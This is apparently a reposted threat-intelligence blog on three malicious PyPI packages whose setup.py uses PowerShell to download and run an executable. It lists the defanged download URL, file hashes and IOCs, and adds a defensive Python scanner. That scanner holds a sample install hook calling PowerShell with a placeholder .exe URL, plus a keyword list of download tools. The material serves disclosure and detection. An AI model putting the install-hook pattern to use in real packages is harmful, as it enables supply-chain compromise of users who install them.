Lolip0p

The FortiGuard Labs team has discovered a new 0-day attack embedded in three PyPI (Python Package Index) packages called ‘colorslib’, ‘httpslib’, and ‘libhttps’. These were found on 10 January 2023 by monitoring an open-source ecosystem. The Python packages ‘colorslib’ and ‘httpslib’ were published on 7 January 2023, and ‘libhttps’ was published on 12 January 2023. All three were published by the same author, ‘Lolip0p’, as shown in the official PyPI repository. ‘Lolip0p’ joined the repository close to the publish date.

Figure 1. Package author information

The author gives each project a description that looks legitimate and clean, as shown below.

Figure 2. Project description of colorslib

Figure 3. Project description of httpslib

Figure 4. Project description of libhttps

All versions of these packages are malicious.

Figure 5. Release history of colorslib

Figure 6. Release history of httpslib

Figure 7. Release history of libhttps

Interestingly, when we look at the setup.py script for these packages, we find they are identical.

Figure 8. setup.py from all packages

The setup.py script tries to launch PowerShell to fetch a suspicious URL that needs further analysis:

https://dl[.]dropbox[.]com/s/mkd3enun97s8zag/Oxzy[.]exe?dl=0
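As an added defender-side example (not code from the Fortinet report or from the packages themselves), the following Python script turns the pattern described above into a pre-install check: it parses a package's setup.py with the standard `ast` module and flags shell or exec calls that mention PowerShell or similar download tools, plus any embedded URL. The sample setup.py contents are constructed for this demo and use a placeholder URL, not the real one.

```python
import ast
import re

# Calls that hand control to a shell or interpreter; installs normally need none of these.
SHELL_CALLS = {"system", "popen", "run", "call", "check_output", "Popen", "exec", "eval"}
# Tools an install script has no business invoking (PowerShell is what this campaign used).
SUSPICIOUS_WORDS = ("powershell", "cmd.exe", "curl", "wget", "certutil", "bitsadmin")
URL_RE = re.compile(r"https?://[^\s'\"]+", re.IGNORECASE)


def _strings(node):
    """Yield every string literal found anywhere inside an AST subtree."""
    for sub in ast.walk(node):
        if isinstance(sub, ast.Constant) and isinstance(sub.value, str):
            yield sub.value


def scan_setup_py(source):
    """Return sorted (line number, finding) pairs for suspicious constructs in setup.py source."""
    findings = set()
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call):
            continue
        func = node.func
        name = func.attr if isinstance(func, ast.Attribute) else getattr(func, "id", "")
        if name in SHELL_CALLS:
            text = " ".join(_strings(node)).lower()
            hits = [w for w in SUSPICIOUS_WORDS if w in text]
            detail = f" mentioning {', '.join(hits)}" if hits else ""
            findings.add((node.lineno, f"shell/exec call {name}(){detail}"))
    # URLs are caught by plain text scanning so they are found even when built from variables.
    for lineno, line in enumerate(source.splitlines(), 1):
        for url in URL_RE.findall(line):
            findings.add((lineno, f"external URL {url}"))
    return sorted(findings)


# Constructed sample modelled on the behaviour described above (placeholder URL, not the real one).
SAMPLE_SETUP_PY = '''\
from setuptools import setup
import os
URL = "https://example.invalid/placeholder.exe"
os.system("powershell -Command " + URL)
setup(name="colorslib", version="4.6.11")
'''
# Constructed benign sample for comparison.
CLEAN_SETUP_PY = 'from setuptools import setup\nsetup(name="demo", version="1.0")\n'

if __name__ == "__main__":
    for lineno, finding in scan_setup_py(SAMPLE_SETUP_PY):
        print(f"line {lineno}: {finding}")
```

To use it on a real package, fetch the source distribution without installing it (`pip download --no-deps --no-binary :all: <package>`), unpack it, and run the scanner over its setup.py before any `pip install`.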

As shown in the VirusTotal entry below, the download URL serves the following binary executable (SHA-256):

8dc8a9f5b5181911b0f4a051444c22e12d319878ea2a9eaaecab9686e876690b

While this download URL has not previously been detected by any other threat researchers, some vendors do flag the downloaded executable file as malicious.

Figure 9. This URL has not been detected by VirusTotal

Figure 10. Vendors that detect the downloaded executable Oxzy.exe

The downloaded executable is called ‘Oxzy.exe’. It drops another executable, ‘update.exe’, which runs from the folder ‘%USER%\AppData\Local\Temp\’.

Figure 11. Dropped file update.exe

As shown in the VirusTotal entry below, several vendors flag this binary executable as malicious (SHA-256):

293a3a2c8992636a5dba58ce088feb276ba39cf1b496b336eb7b6f65b1ddb757

Figure 12. Vendors that detect the dropped executable update.exe

When running ‘update.exe’, it drops a series of files to the folder ‘%USER%\AppData\Local\Temp\onefile_%PID_%TIME%’.

Figure 13. update.exe running

Figure 14. Dropped files

The dropped file ‘SearchProtocolHost.exe’ is flagged as malicious by several vendors (SHA-256):

123fd1c46a166c54ad66e66a10d53623af64c4b52b1827dfd8a96fdbf7675638

Figure 15. Vendors that detect SearchProtocolHost.exe

Conclusion:  In this blog, we showed a single author posting separate Python packages that use the same code to launch an attack. The author also positions each package as legitimate and clean by including a convincing project description. However, these packages download and run a malicious binary executable.

Python end users should always perform due diligence before downloading and running any packages, especially from new authors. And as can be seen, publishing more than one package in a short time period is no indication that an author is reliable.

The malicious executables identified in this report are detected as:

  • exe: Malicious_Behavior.SB
  • exe: PossibleThreat.PALLASNET.H
  • exe: Malicious_Behavior.SB

IOCs:

  • oxzy.exe
    • 8dc8a9f5b5181911b0f4a051444c22e12d319878ea2a9eaaecab9686e876690b
  • update.exe
    • 293a3a2c8992636a5dba58ce088feb276ba39cf1b496b336eb7b6f65b1ddb757
  • SearchProtocolHost.exe
    • 123fd1c46a166c54ad66e66a10d53623af64c4b52b1827dfd8a96fdbf7675638
  • Malicious URL
    • https://dl[.]dropbox[.]com/s/mkd3enun97s8zag/Oxzy[.]exe?dl=0

Source: https://www.fortinet.com/blog/threat-research/supply-chain-attack-using-identical-pypi-packages-colorslib-httpslib-libhttps/

Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. For questions, comments or assistance, please contact the office directly at 1-844-492-7225, or feedback@wapacklabs.com

Weekly Cyber Intelligence Briefings:

  • Reporting: https://www.redskyalliance.org/
  • Website:   https://www.wapacklabs.com/
  • LinkedIn:  https://www.linkedin.com/company/64265941

REDSHORTS - Weekly Cyber Intelligence Briefings

https://attendee.gotowebinar.com/register/5504229295967742989
